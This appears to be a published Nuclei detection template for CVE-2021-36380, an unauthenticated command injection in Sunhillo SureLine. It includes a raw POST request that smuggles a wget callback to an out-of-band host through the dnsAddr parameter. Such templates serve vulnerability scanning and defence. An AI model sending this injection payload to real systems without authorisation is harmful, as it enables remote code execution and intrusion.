Sunhillo SureLine <8.7.0.1.1 - Unauthenticated OS Command Injection

ID: CVE-2021-36380

Severity: critical

Author: gy741

Tags: cve2021,cve,sureline,rce,oast,sunhillo,kev

Description

Sunhillo SureLine <8.7.0.1.1 is vulnerable to OS command injection. The /cgi/networkDiag.cgi script directly incorporated user-controllable parameters within a shell command, allowing an attacker to manipulate the resulting command by injecting valid OS command input. The following POST request injects a new command that instructs the server to establish a reverse TCP connection to another system, allowing the establishment of an interactive remote shell session.

YAML Source

id: CVE-2021-36380

info:
  name: Sunhillo SureLine <8.7.0.1.1 - Unauthenticated OS Command Injection
  author: gy741
  severity: critical
  description: Sunhillo SureLine <8.7.0.1.1 is vulnerable to OS command injection. The /cgi/networkDiag.cgi script directly incorporated user-controllable parameters within a shell command, allowing an attacker to manipulate the resulting command by injecting valid OS command input. The following POST request injects a new command that instructs the server to establish a reverse TCP connection to another system, allowing the establishment of an interactive remote shell session.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.
  remediation: |
    Upgrade to Sunhillo SureLine version 8.7.0.1.1 or later to mitigate this vulnerability.
  reference:
    - https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-36380
    - https://www.sunhillo.com/product/sureline/
    - https://github.com/Ostorlab/KEV
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-36380
    cwe-id: CWE-78
    epss-score: 0.97494
    epss-percentile: 0.99977
    cpe: cpe:2.3:a:sunhillo:sureline:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sunhillo
    product: sureline
  tags: cve2021,cve,sureline,rce,oast,sunhillo,kev

http:
  - raw:
      - |
        POST /cgi/networkDiag.cgi HTTP/1.1
        Host: {{Hostname}}

        command=2&ipAddr=&dnsAddr=$(wget+http://{{interactsh-url}})&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a004730450221009399c9dac7c81c43efb2ec43abfa908f004a607df3145ecb880f59df895ac6ce022076f3cad81b212a887b46179562b2d333bdeb381ad6c8f3e79466521f678bd8ea:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-36380.yaml"

View on Github